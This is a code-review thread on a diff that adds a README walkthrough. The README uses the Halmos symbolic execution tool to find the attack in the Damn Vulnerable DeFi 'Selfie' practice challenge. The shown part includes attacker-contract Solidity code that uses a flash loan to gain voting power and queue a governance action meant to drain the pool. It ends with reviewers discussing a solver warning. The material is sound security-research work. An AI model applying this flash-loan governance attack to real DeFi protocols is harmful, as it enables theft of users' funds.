test/selfie/README.md

```diff
@@ -0,0 +1,811 @@
+
+But it is still not clear how to use this bug to empty the pool. Therefore, our journey continues.
+## SymbolicAttacker preload
+Now, before executing `attacker.attack()`, we will register some **action** using the bug we found in the previous section. But what **action** exactly? Let's make it symbolic and the solver will figure it out later.
+```solidity
+function check_selfie() public checkSolvedByPlayer {
+    ...
+    attacker.preload();
+    uint256 warp = svm.createUint256("preattack_warp");
+    vm.warp(block.timestamp + warp); // wait for symbolic time between transactions
+    attacker.attack();
+}
+```
+```solidity
+function onFlashLoan(address initiator, address token,
+                    uint256 amount, uint256 fee,
+                    bytes calldata data
+) external returns (bytes32) 
+{
+    if (is_preload) {
+        DamnValuableVotes(token).delegate(address(this));
+        SimpleGovernance governance = SimpleGovernance(address(0xaaaa0004));
+        address target = svm.createAddress("preload_onFlashLoan_target");
+        uint256 value = svm.createUint256("preload_onFlashLoan_value");
+        bytes memory data = svm.createBytes(1000, "preload_onFlashLoan_data");
+        governance.queueAction(target, uint128(value), data);
+    }
+    else {
+        execute_tx("onFlashLoan_target");
+    }
+    DamnValuableVotes(token).approve(address(msg.sender), 2**256 - 1); // unlimited approve for pool
+    return (keccak256("ERC3156FlashBorrower.onFlashLoan"));
+}
+
+function preload(SelfiePool pool, DamnValuableVotes token) public {
+    is_preload = true;
+    bytes memory data = svm.createBytes(1000, "preload_data");
+    uint256 amount = svm.createUint256("preload_amount");
+    pool.flashLoan(IERC3156FlashBorrower(address(this)), address(token), amount, data);
+    is_preload = false;
+}
+...
+```
+We do not forget to remove assert for the constancy of `_actionCounter`, otherwise every path will be a counterexample:
+```solidity
+function _isSolved() private view {
+    ...
+    // Check number of registered actions
+    //assert (governance._actionCounter() == 1);
+}
+```
+Since we unlocked the `executeAction` function, let's start again with one symbolic transaction. Will see if that's enough.
+
+Run:
+```javascript
+$ halmos --solver-timeout-assertion 0 --function check_selfie --loop 3
+...
+WARNING  Encountered symbolic memory offset: 320 + Concat(...)
+...
+```
+The problem here is:
+```solidity
+function executeAction(uint256 actionId) external payable returns (bytes memory) {
+...
+GovernanceAction storage actionToExecute = _actions[actionId];
+...
+```
+Obviously, we have only one action. Feel free to use `assume`:
+```solidity
+function executeAction(uint256 actionId) external payable returns (bytes memory) {
+    vm.assume(actionId == 1);
+    ...
+```
```

Comment:
I can't immediately see why that warning relates to the action lookup, weird 🤨 @daejunpark does it make sense to you?

Reply:
good question. i guess it might be related to the copy of GovernanceAction struct into memory (which happens inside _canBeExecuted() called by executeAction().)

the GovernanceAction struct contains a `bytes data` field, and copying it may cause the symbolic memory offset error.